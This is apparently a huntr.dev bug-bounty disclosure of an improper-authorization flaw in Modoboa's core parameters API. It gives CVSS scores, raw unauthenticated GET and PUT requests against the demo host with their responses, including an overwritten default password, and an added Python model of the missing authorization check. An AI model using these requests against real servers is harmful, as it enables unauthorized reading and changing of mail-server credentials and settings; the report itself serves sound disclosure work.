huntr / 7h3h4ckv157 / 351F9055-2008-4AF0-B820-01FF66678BF3
History: Feb 25, 2023 - 3:56 a.m.

Improper Authorization

2023-02-25 03:56:00
7h3h4ckv157
www.huntr.dev

Tags: improper authorization, sensitive information exposure, security risk, data confidentiality, data integrity, unauthorized access

9.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

6.4 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:P/A:N

0.012 Low

EPSS

Percentile

85.1%

Description

During testing, it was observed that sending a GET request to the endpoint /api/v2/parameters/core/ returns sensitive configuration information without any authentication or authorization.

Request

GET /api/v2/parameters/core/ HTTP/1.1
Host: demo.modoboa.org
User-Agent: 7h3h4ckv157
Accept: application/json, text/plain, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 0
Connection: close


Response

HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Sat, 25 Feb 2023 03:26:58 GMT
Content-Type: application/json
Content-Length: 1709
Connection: close
Vary: Accept, Accept-Language, Cookie
Allow: GET, PUT, HEAD, OPTIONS
X-Frame-Options: SAMEORIGIN
Content-Language: en

{"label":"General","params":{"authentication_type":"local","password_scheme":"sha512crypt","rounds_number":70000,"update_scheme":true,"default_password":"Pwned-by-7h3h4ckv157","random_password_length":8,"update_password_url":"","password_recovery_msg":"","sms_password_recovery":false,"sms_provider":null,"ldap_server_address":"localhost","ldap_server_port":389,"ldap_enable_secondary_server":false,"ldap_secondary_server_address":"localhost","ldap_secondary_server_port":389,"ldap_secured":"none","ldap_is_active_directory":false,"ldap_admin_groups":"","ldap_group_type":"posixgroup","ldap_groups_search_base":"","ldap_password_attribute":"userPassword","ldap_auth_method":"searchbind","ldap_bind_dn":"","ldap_bind_password":"","ldap_search_base":"","ldap_search_filter":"(mail=%(user)s)","ldap_user_dn_template":"","ldap_sync_bind_dn":"","ldap_sync_bind_password":"","ldap_enable_sync":false,"ldap_sync_delete_remote_account":false,"ldap_sync_account_dn_template":"","ldap_enable_import":false,"ldap_import_search_base":"","ldap_import_search_filter":"(cn=*)","ldap_import_username_attr":"cn","ldap_dovecot_sync":false,"ldap_dovecot_conf_file":"/etc/dovecot/dovecot-modoboa.conf","rss_feed_url":null,"hide_features_widget":false,"sender_address":"[email protected]","enable_api_communication":true,"check_new_versions":true,"send_new_versions_email":false,"new_versions_email_rcpt":"[email protected]","send_statistics":true,"inactive_account_threshold":30,"top_notifications_check_interval":30,"log_maximum_age":365,"items_per_page":30,"default_top_redirection":"user","sms_ovh_endpoint":"ovh-eu","sms_ovh_application_key":null,"sms_ovh_application_secret":null,"sms_ovh_consumer_key":null}}

The response contained sensitive information (including the default password and LDAP/SMS credential fields) which could be used by an attacker to gain unauthorized access to the system.
This issue poses a significant risk to the confidentiality and integrity of the system and its users, because the information returned by the GET request can also be modified with an unauthenticated PUT request to the same endpoint.

Request

PUT /api/v2/parameters/core/ HTTP/1.1
Host: demo.modoboa.org
User-Agent: 7h3h4ckv157
Accept: application/json, text/plain, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 1680
Connection: close

{"authentication_type":"local","password_scheme":"sha512crypt","rounds_number":70000,"update_scheme":true,"default_password":"Pwned-by-7h3h4ckv157","random_password_length":8,"update_password_url":"","password_recovery_msg":"","sms_password_recovery":false,"sms_provider":null,"ldap_server_address":"localhost","ldap_server_port":389,"ldap_enable_secondary_server":false,"ldap_secondary_server_address":"localhost","ldap_secondary_server_port":389,"ldap_secured":"none","ldap_is_active_directory":false,"ldap_admin_groups":"","ldap_group_type":"posixgroup","ldap_groups_search_base":"","ldap_password_attribute":"userPassword","ldap_auth_method":"searchbind","ldap_bind_dn":"","ldap_bind_password":"","ldap_search_base":"","ldap_search_filter":"(mail=%(user)s)","ldap_user_dn_template":"","ldap_sync_bind_dn":"","ldap_sync_bind_password":"","ldap_enable_sync":false,"ldap_sync_delete_remote_account":false,"ldap_sync_account_dn_template":"","ldap_enable_import":false,"ldap_import_search_base":"","ldap_import_search_filter":"(cn=*)","ldap_import_username_attr":"cn","ldap_dovecot_sync":false,"ldap_dovecot_conf_file":"/etc/dovecot/dovecot-modoboa.conf","rss_feed_url":null,"hide_features_widget":false,"sender_address":"[email protected]","enable_api_communication":true,"check_new_versions":true,"send_new_versions_email":false,"new_versions_email_rcpt":"[email protected]","send_statistics":true,"inactive_account_threshold":30,"top_notifications_check_interval":30,"log_maximum_age":365,"items_per_page":30,"default_top_redirection":"user","sms_ovh_endpoint":"ovh-eu","sms_ovh_application_key":null,"sms_ovh_application_secret":null,"sms_ovh_consumer_key":null}

Response

HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Sat, 25 Feb 2023 03:24:46 GMT
Content-Length: 0
Connection: close
Vary: Accept, Accept-Language, Cookie
Allow: GET, PUT, HEAD, OPTIONS
X-Frame-Options: SAMEORIGIN
Content-Language: en
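The two exchanges above show the same endpoint answering GET and PUT with no credentials. The following Python model, added here as an illustration and not code from the report or from the Modoboa project, shows the authorization gate such an endpoint needs (401 for anonymous callers, 403 for non-administrators) applied before anything is read or written, plus a helper that flags the secret-bearing keys from the report's response; the User class, the handler and the SECRET_KEYS inventory are assumptions for the example.

```python
import json
from dataclasses import dataclass
from typing import Optional

# Excerpt of the unauthenticated GET response shown in the report (constructed subset).
SAMPLE_RESPONSE = json.loads(
    '{"label":"General","params":{"authentication_type":"local",'
    '"default_password":"Pwned-by-7h3h4ckv157","ldap_bind_dn":"",'
    '"ldap_bind_password":"","sms_ovh_application_secret":null,"items_per_page":30}}'
)

# Keys from the report's response that carry credentials or secrets (assumed inventory).
SECRET_KEYS = {
    "default_password", "ldap_bind_password", "ldap_sync_bind_password",
    "sms_ovh_application_key", "sms_ovh_application_secret", "sms_ovh_consumer_key",
}

@dataclass
class User:  # hypothetical stand-in for the framework's request.user
    is_authenticated: bool = False
    is_superuser: bool = False

def authorize(user: User) -> int:
    """Gate for the endpoint: 401 for anonymous, 403 for non-admin, 200 otherwise."""
    if not user.is_authenticated:
        return 401
    if not user.is_superuser:
        return 403
    return 200

def handle_parameters(method: str, user: User, store: dict, body: Optional[dict] = None):
    """Model of the fixed endpoint: every method is gated before the store is read or written."""
    status = authorize(user)
    if status != 200:
        return status, None  # nothing disclosed, nothing modified
    if method == "GET":
        return 200, {"label": "General", "params": dict(store)}
    if method == "PUT":
        unknown = set(body or {}) - set(store)
        if unknown:  # reject keys the settings model does not define
            return 400, {"unknown_params": sorted(unknown)}
        store.update(body or {})
        return 200, None
    return 405, None

def leaked_secrets(response: dict) -> set:
    """Secret-bearing keys in a response body; any hit on an unauthenticated reply is exposure."""
    return SECRET_KEYS & set(response.get("params", {}))
```

Running leaked_secrets over the report's response body is a quick way to confirm that a reply obtained without credentials contains material that should only ever reach an administrator.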


Proof of Concept

[Screenshots poc1.png and poc2.png not reproduced here.]

